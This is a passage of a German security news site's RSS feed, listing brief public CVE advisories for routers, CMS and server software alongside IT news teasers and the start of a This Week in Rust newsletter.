<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/typesetter:cms">Typesetter CMS up to 5.1</a>. This affects an unknown function of the file <em>include/admin/Tools/Status.php</em> of the component <em>Administrative Interface</em>. Performing a manipulation of the argument <em>path</em> results in cross site scripting. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2025-71165">CVE-2025-71165</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA['Rust makes coding fun again': Why Linux is moving away from C, according to Greg Kroah-Hartman]]></title>
<description><![CDATA[C won't be disappearing tomorrow, says the stable kernel maintainer, but the future of Linux belongs to Rust.]]></description>
<link>https://tsecurity.de/de/3671352/it-nachrichten/rust-makes-coding-fun-again-why-linux-is-moving-away-from-c-according-to-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671352/it-nachrichten/rust-makes-coding-fun-again-why-linux-is-moving-away-from-c-according-to-greg-kroah-hartman/</guid>
<pubDate>Wed, 15 Jul 2026 18:34:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[C won't be disappearing tomorrow, says the stable kernel maintainer, but the future of Linux belongs to Rust.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-36265 | Apache Submarine Server Core 0.8.0 authorization]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Apache Submarine Server Core 0.8.0. The affected element is an unknown function. The manipulation results in incorrect authorization. This vulnerability only affects products that are no longer supported by the maintainer.

This vulne...]]></description>
<link>https://tsecurity.de/de/3667837/sicherheitsluecken/cve-2024-36265-apache-submarine-server-core-080-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667837/sicherheitsluecken/cve-2024-36265-apache-submarine-server-core-080-authorization/</guid>
<pubDate>Tue, 14 Jul 2026 13:55:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/apache:submarine_server_core">Apache Submarine Server Core 0.8.0</a>. The affected element is an unknown function. The manipulation results in incorrect authorization. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2024-36265">CVE-2024-36265</a>. The attack must originate from the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15483 | TRENDnet TEW-821DAP 1.12B01 ssi /goform/tools_nslookup sub_41EC14 nslookup_target buffer overflow (EUVD-2026-43205)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in TRENDnet TEW-821DAP 1.12B01. Impacted is the function sub_41EC14 of the file /goform/tools_nslookup of the component ssi. The manipulation of the argument nslookup_target leads to buffer overflow. This vulnerability only affects products th...]]></description>
<link>https://tsecurity.de/de/3663633/sicherheitsluecken/cve-2026-15483-trendnet-tew-821dap-112b01-ssi-goformtoolsnslookup-sub41ec14-nslookuptarget-buffer-overflow-euvd-2026-43205/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663633/sicherheitsluecken/cve-2026-15483-trendnet-tew-821dap-112b01-ssi-goformtoolsnslookup-sub41ec14-nslookuptarget-buffer-overflow-euvd-2026-43205/</guid>
<pubDate>Sun, 12 Jul 2026 19:08:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/trendnet:tew-821dap">TRENDnet TEW-821DAP 1.12B01</a>. Impacted is the function <code>sub_41EC14</code> of the file <em>/goform/tools_nslookup</em> of the component <em>ssi</em>. The manipulation of the argument <em>nslookup_target</em> leads to buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-15483">CVE-2026-15483</a>. It is possible to initiate the attack remotely. There is no exploit available.

The vendor explains: "We are unable to confirm the existence of the vulnerabilities for (...) TEW-821DAP (v1.0R) as these items have been EOL. "]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15480 | Trendnet TEW-635BRM up to 1.00.03 Web Service /sbin/rc start_httpd device_name stack-based overflow (EUVD-2026-43202)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Trendnet TEW-635BRM up to 1.00.03. This affects the function start_httpd of the file /sbin/rc of the component Web Service. Such manipulation of the argument device_name leads to stack-based buffer overflow. This vulnerability only affects pro...]]></description>
<link>https://tsecurity.de/de/3663630/sicherheitsluecken/cve-2026-15480-trendnet-tew-635brm-up-to-10003-web-service-sbinrc-starthttpd-devicename-stack-based-overflow-euvd-2026-43202/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663630/sicherheitsluecken/cve-2026-15480-trendnet-tew-635brm-up-to-10003-web-service-sbinrc-starthttpd-devicename-stack-based-overflow-euvd-2026-43202/</guid>
<pubDate>Sun, 12 Jul 2026 19:08:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/trendnet:tew-635brm">Trendnet TEW-635BRM up to 1.00.03</a>. This affects the function <code>start_httpd</code> of the file <em>/sbin/rc</em> of the component <em>Web Service</em>. Such manipulation of the argument <em>device_name</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-15480">CVE-2026-15480</a>. The attack can be executed remotely. Additionally, an exploit exists.

The vendor explains: "We are unable to confirm if the vulnerability exists. This item has been EOL since 2011. We will make an official announcement of possible vulnerabilities, and recommend users to switch devices."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15481 | Trendnet TEW-635BRM up to 1.00.03 IPoA WAN Connection Setup /sbin/rc ipoa_test ipoa_ipaddr command injection (EUVD-2026-43203)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Trendnet TEW-635BRM up to 1.00.03. This vulnerability affects the function ipoa_test of the file /sbin/rc of the component IPoA WAN Connection Setup. Performing a manipulation of the argument ipoa_ipaddr results in command injection. This vu...]]></description>
<link>https://tsecurity.de/de/3663629/sicherheitsluecken/cve-2026-15481-trendnet-tew-635brm-up-to-10003-ipoa-wan-connection-setup-sbinrc-ipoatest-ipoaipaddr-command-injection-euvd-2026-43203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663629/sicherheitsluecken/cve-2026-15481-trendnet-tew-635brm-up-to-10003-ipoa-wan-connection-setup-sbinrc-ipoatest-ipoaipaddr-command-injection-euvd-2026-43203/</guid>
<pubDate>Sun, 12 Jul 2026 19:08:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/trendnet:tew-635brm">Trendnet TEW-635BRM up to 1.00.03</a>. This vulnerability affects the function <code>ipoa_test</code> of the file <em>/sbin/rc</em> of the component <em>IPoA WAN Connection Setup</em>. Performing a manipulation of the argument <em>ipoa_ipaddr</em> results in command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-15481">CVE-2026-15481</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.

The vendor explains: "We are unable to confirm if the vulnerability exists. This item has been EOL since 2011. We will make an official announcement of possible vulnerabilities, and recommend users to switch devices."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15496 | SonicCloudOrg sonic-agent up to 2.7.2 Groovy Script GroovyScriptImpl.java evalIsFailed os command injection (EUVD-2026-43218)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in SonicCloudOrg sonic-agent up to 2.7.2. The impacted element is the function evalIsFailed of the file sonic-agent/src/main/java/org/cloud/sonic/agent/tests/script/GroovyScriptImpl.java of the component Groovy Script Handler. The manipula...]]></description>
<link>https://tsecurity.de/de/3663558/sicherheitsluecken/cve-2026-15496-soniccloudorg-sonic-agent-up-to-272-groovy-script-groovyscriptimpljava-evalisfailed-os-command-injection-euvd-2026-43218/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663558/sicherheitsluecken/cve-2026-15496-soniccloudorg-sonic-agent-up-to-272-groovy-script-groovyscriptimpljava-evalisfailed-os-command-injection-euvd-2026-43218/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. The impacted element is the function <code>evalIsFailed</code> of the file <em>sonic-agent/src/main/java/org/cloud/sonic/agent/tests/script/GroovyScriptImpl.java</em> of the component <em>Groovy Script Handler</em>. The manipulation results in os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-15496">CVE-2026-15496</a>. The attack can be launched remotely. Moreover, an exploit is present.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15484 | TRENDnet TEW-821DAP 1.12B01 ssi /goform/tools_nslookup sub_41EC14 buffer overflow (EUVD-2026-43206)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in TRENDnet TEW-821DAP 1.12B01. The affected element is the function sub_41EC14 of the file /goform/tools_nslookup of the component ssi. The manipulation results in buffer overflow. This vulnerability only affects products that are no longer suppor...]]></description>
<link>https://tsecurity.de/de/3663553/sicherheitsluecken/cve-2026-15484-trendnet-tew-821dap-112b01-ssi-goformtoolsnslookup-sub41ec14-buffer-overflow-euvd-2026-43206/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663553/sicherheitsluecken/cve-2026-15484-trendnet-tew-821dap-112b01-ssi-goformtoolsnslookup-sub41ec14-buffer-overflow-euvd-2026-43206/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/trendnet:tew-821dap">TRENDnet TEW-821DAP 1.12B01</a>. The affected element is the function <code>sub_41EC14</code> of the file <em>/goform/tools_nslookup</em> of the component <em>ssi</em>. The manipulation results in buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-15484">CVE-2026-15484</a>. It is possible to launch the attack remotely. No exploit is available.

The vendor explains: "We are unable to confirm the existence of the vulnerabilities for (...) TEW-821DAP (v1.0R) as these items have been EOL. "]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15485 | TRENDnet TEW-821DAP 1.11B03 DNS Lookup /goform/tools_nslookup sub_43F2C4 nslookup_target/dns_server os command injection (EUVD-2026-43207)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in TRENDnet TEW-821DAP 1.11B03. The impacted element is the function sub_43F2C4 of the file /goform/tools_nslookup of the component DNS Lookup Handler. This manipulation of the argument nslookup_target/dns_server causes os command ...]]></description>
<link>https://tsecurity.de/de/3663552/sicherheitsluecken/cve-2026-15485-trendnet-tew-821dap-111b03-dns-lookup-goformtoolsnslookup-sub43f2c4-nslookuptargetdnsserver-os-command-injection-euvd-2026-43207/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663552/sicherheitsluecken/cve-2026-15485-trendnet-tew-821dap-111b03-dns-lookup-goformtoolsnslookup-sub43f2c4-nslookuptargetdnsserver-os-command-injection-euvd-2026-43207/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/trendnet:tew-821dap">TRENDnet TEW-821DAP 1.11B03</a>. The impacted element is the function <code>sub_43F2C4</code> of the file <em>/goform/tools_nslookup</em> of the component <em>DNS Lookup Handler</em>. This manipulation of the argument <em>nslookup_target/dns_server</em> causes os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-15485">CVE-2026-15485</a>. The attack can be initiated remotely. There is not any exploit available.

The vendor explains: "We are unable to confirm the existence of the vulnerabilities for (...) TEW-821DAP (v1.0R) as these items have been EOL. "]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15486 | TRENDnet TEW-821DAP 1.11B03 Firmware Update /goform/tools_ddns sub_42026C hostname/username/password os command injection (EUVD-2026-43208)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in TRENDnet TEW-821DAP 1.11B03. This affects the function sub_42026C of the file /goform/tools_ddns of the component Firmware Update Handler. Such manipulation of the argument hostname/username/password leads to os command injection. Th...]]></description>
<link>https://tsecurity.de/de/3663551/sicherheitsluecken/cve-2026-15486-trendnet-tew-821dap-111b03-firmware-update-goformtoolsddns-sub42026c-hostnameusernamepassword-os-command-injection-euvd-2026-43208/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663551/sicherheitsluecken/cve-2026-15486-trendnet-tew-821dap-111b03-firmware-update-goformtoolsddns-sub42026c-hostnameusernamepassword-os-command-injection-euvd-2026-43208/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/trendnet:tew-821dap">TRENDnet TEW-821DAP 1.11B03</a>. This affects the function <code>sub_42026C</code> of the file <em>/goform/tools_ddns</em> of the component <em>Firmware Update Handler</em>. Such manipulation of the argument <em>hostname/username/password</em> leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-15486">CVE-2026-15486</a>. The attack can be launched remotely. No exploit exists.

The vendor explains: "We are unable to confirm the existence of the vulnerabilities for (...) TEW-821DAP (v1.0R) as these items have been EOL. "]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15487 | TRENDnet TEW-821DAP 1.11B03 Firmware Update /goform/system_ntp sub_41FBD0 Hostname os command injection (EUVD-2026-43209)]]></title>
<description><![CDATA[A vulnerability has been found in TRENDnet TEW-821DAP 1.11B03 and classified as critical. This impacts the function sub_41FBD0 of the file /goform/system_ntp of the component Firmware Update Handler. Performing a manipulation of the argument Hostname results in os command injection. This vulnerab...]]></description>
<link>https://tsecurity.de/de/3663550/sicherheitsluecken/cve-2026-15487-trendnet-tew-821dap-111b03-firmware-update-goformsystemntp-sub41fbd0-hostname-os-command-injection-euvd-2026-43209/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663550/sicherheitsluecken/cve-2026-15487-trendnet-tew-821dap-111b03-firmware-update-goformsystemntp-sub41fbd0-hostname-os-command-injection-euvd-2026-43209/</guid>
<pubDate>Sun, 12 Jul 2026 18:11:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/trendnet:tew-821dap">TRENDnet TEW-821DAP 1.11B03</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts the function <code>sub_41FBD0</code> of the file <em>/goform/system_ntp</em> of the component <em>Firmware Update Handler</em>. Performing a manipulation of the argument <em>Hostname</em> results in os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-15487">CVE-2026-15487</a>. The attack may be initiated remotely. There is no available exploit.

The vendor explains: "We are unable to confirm the existence of the vulnerabilities for (...) TEW-821DAP (v1.0R) as these items have been EOL. "]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15495 | SonicCloudOrg sonic-agent up to 2.7.2 Android WebSocket Server AndroidWSServer.java path os command injection (EUVD-2026-43217)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in SonicCloudOrg sonic-agent up to 2.7.2. The affected element is an unknown function of the file AndroidWSServer.java of the component Android WebSocket Server. The manipulation of the argument path leads to os command injection. This vulnerab...]]></description>
<link>https://tsecurity.de/de/3663477/sicherheitsluecken/cve-2026-15495-soniccloudorg-sonic-agent-up-to-272-android-websocket-server-androidwsserverjava-path-os-command-injection-euvd-2026-43217/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663477/sicherheitsluecken/cve-2026-15495-soniccloudorg-sonic-agent-up-to-272-android-websocket-server-androidwsserverjava-path-os-command-injection-euvd-2026-43217/</guid>
<pubDate>Sun, 12 Jul 2026 17:08:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. The affected element is an unknown function of the file <em>AndroidWSServer.java</em> of the component <em>Android WebSocket Server</em>. The manipulation of the argument <em>path</em> leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-15495">CVE-2026-15495</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15497 | SonicCloudOrg sonic-agent up to 2.7.2 JWT Authentication Filter ExchangeController.java code injection (EUVD-2026-43219)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in SonicCloudOrg sonic-agent up to 2.7.2. This affects an unknown function of the file sonic-server-controller/src/main/java/org/cloud/sonic/controller/controller/ExchangeController.java of the component JWT Authentication Filter. This manipul...]]></description>
<link>https://tsecurity.de/de/3663471/sicherheitsluecken/cve-2026-15497-soniccloudorg-sonic-agent-up-to-272-jwt-authentication-filter-exchangecontrollerjava-code-injection-euvd-2026-43219/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663471/sicherheitsluecken/cve-2026-15497-soniccloudorg-sonic-agent-up-to-272-jwt-authentication-filter-exchangecontrollerjava-code-injection-euvd-2026-43219/</guid>
<pubDate>Sun, 12 Jul 2026 17:08:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/soniccloudorg:sonic-agent">SonicCloudOrg sonic-agent up to 2.7.2</a>. This affects an unknown function of the file <em>sonic-server-controller/src/main/java/org/cloud/sonic/controller/controller/ExchangeController.java</em> of the component <em>JWT Authentication Filter</em>. This manipulation causes code injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-15497">CVE-2026-15497</a>. The attack may be initiated remotely. In addition, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54369 | acl up to 2.3.x link following (Nessus ID 326364)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in acl up to 2.3.x. This issue affects the function acl_get_file/acl_set_file/acl_extended_file/acl_delete_def_file. Executing a manipulation can lead to link following. This vulnerability only affects products that are no longer support...]]></description>
<link>https://tsecurity.de/de/3661941/sicherheitsluecken/cve-2026-54369-acl-up-to-23x-link-following-nessus-id-326364/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661941/sicherheitsluecken/cve-2026-54369-acl-up-to-23x-link-following-nessus-id-326364/</guid>
<pubDate>Sat, 11 Jul 2026 15:53:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/acl">acl up to 2.3.x</a>. This issue affects the function <code>acl_get_file/acl_set_file/acl_extended_file/acl_delete_def_file</code>. Executing a manipulation can lead to link following. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-54369">CVE-2026-54369</a>. The attack needs to be launched locally. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[The open source library holding up your stack might have one maintainer]]></title>
<description><![CDATA[Every serious software product runs on code that someone else wrote and released for free. A web service leans on a cryptography library, a data pipeline pulls in a parser, and a mobile app ships a handful of small utilities…
Read more →
The post The open source library holding up your stack migh...]]></description>
<link>https://tsecurity.de/de/3658990/it-security-nachrichten/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658990/it-security-nachrichten/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/</guid>
<pubDate>Fri, 10 Jul 2026 09:35:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every serious software product runs on code that someone else wrote and released for free. A web service leans on a cryptography library, a data pipeline pulls in a parser, and a mobile app ships a handful of small utilities…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/">The open source library holding up your stack might have one maintainer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The open source library holding up your stack might have one maintainer]]></title>
<description><![CDATA[Every serious software product runs on code that someone else wrote and released for free. A web service leans on a cryptography library, a data pipeline pulls in a parser, and a mobile app ships a handful of small utilities that one person maintains in spare time. All of it carries the same labe...]]></description>
<link>https://tsecurity.de/de/3658924/it-security-nachrichten/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658924/it-security-nachrichten/the-open-source-library-holding-up-your-stack-might-have-one-maintainer/</guid>
<pubDate>Fri, 10 Jul 2026 09:08:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every serious software product runs on code that someone else wrote and released for free. A web service leans on a cryptography library, a data pipeline pulls in a parser, and a mobile app ships a handful of small utilities that one person maintains in spare time. All of it carries the same label. A new paper argues that the single label hides differences large enough to change how each piece behaves once it lands … <a href="https://www.helpnetsecurity.com/2026/07/10/open-source-software-library-types/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/10/open-source-software-library-types/">The open source library holding up your stack might have one maintainer</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Roundcube Webmail 1.7.2 Fixes Zero-Click XSS, SSRF Bypass, and DoS Flaws]]></title>
<description><![CDATA[Roundcube has released version 1.7.2, a security-focused update addressing six vulnerabilities, including two CVE-tracked flaws that could allow attackers to execute stored cross-site scripting (XSS) without any user interaction. Maintainer alecpl pushed the release five days ago, urging all prod...]]></description>
<link>https://tsecurity.de/de/3658796/it-security-nachrichten/roundcube-webmail-172-fixes-zero-click-xss-ssrf-bypass-and-dos-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658796/it-security-nachrichten/roundcube-webmail-172-fixes-zero-click-xss-ssrf-bypass-and-dos-flaws/</guid>
<pubDate>Fri, 10 Jul 2026 07:23:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Roundcube has released version 1.7.2, a security-focused update addressing six vulnerabilities, including two CVE-tracked flaws that could allow attackers to execute stored cross-site scripting (XSS) without any user interaction. Maintainer alecpl pushed the release five days ago, urging all production deployments to update immediately after backing up data. The most severe issue, tracked as CVE-2026-54433, […]</p>
<p>The post <a href="https://cyberpress.org/roundcube-webmail-1-7-2-fixes-zero-click-xss-dos/">Roundcube Webmail 1.7.2 Fixes Zero-Click XSS, SSRF Bypass, and DoS Flaws</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beliebter Dropbox-Client für macOS vor dem Aus]]></title>
<description><![CDATA[Sam Schott, Maintainer von Maestral, gibt auf. Die App wird künftig nicht mehr entwickelt. Er selbst nutze Dropbox nicht mehr.]]></description>
<link>https://tsecurity.de/de/3656372/it-nachrichten/beliebter-dropbox-client-fuer-macos-vor-dem-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656372/it-nachrichten/beliebter-dropbox-client-fuer-macos-vor-dem-aus/</guid>
<pubDate>Thu, 09 Jul 2026 10:32:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sam Schott, Maintainer von Maestral, gibt auf. Die App wird künftig nicht mehr entwickelt. Er selbst nutze Dropbox nicht mehr.]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 659]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/07/maintainer-spotlight-gen-li-rami3l/">Maintainer spotlight: Gen Li (@rami3l)</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/06/unite-for-clippy/">Together for a healthier Clippy</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-75">The Embedded Rustacean Issue #75</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://www.copper-robotics.com/whats-new/copper-rs-v100">copper-rs v1.0.0</a>: the open source deterministic robotics OS is now stable.</li>
<li><a href="https://rayfish.xyz/blog/01-introducing-rayfish">Rayfish: Your own private network. No servers, no setup.</a></li>
<li><a href="https://plabayo.tech/blog/rama-0-3">rama v0.3.0 — network service framework ready to be used by the wider Rust community</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.9.0">kache 0.9.0: supply-chain hardening + read-only CI cache</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/07/04/meet-guardiandbs-new-postgresql-compatibility-layer/">GuardianDB - PostgreSQL and P2P/Local-First Together</a></li>
<li><a href="https://buildnectar.com/">Nectar: a Rust-like language that compiles your whole web app to WebAssembly</a></li>
<li><a href="https://thekeeper.io/blog/logdrain-log-template-mining-in-rust/">logdrain: Fast, Embeddable Log-Template Mining in Rust</a></li>
<li><a href="https://medium.com/@vbasky/packaging-the-worlds-video-in-pure-rust-ff1f6b884fec">sheathe: Packaging the World's Video in Pure Rust</a></li>
<li><a href="https://docs.wickra.org/Quickstart-Rust">wickra: streaming-first technical indicators</a></li>
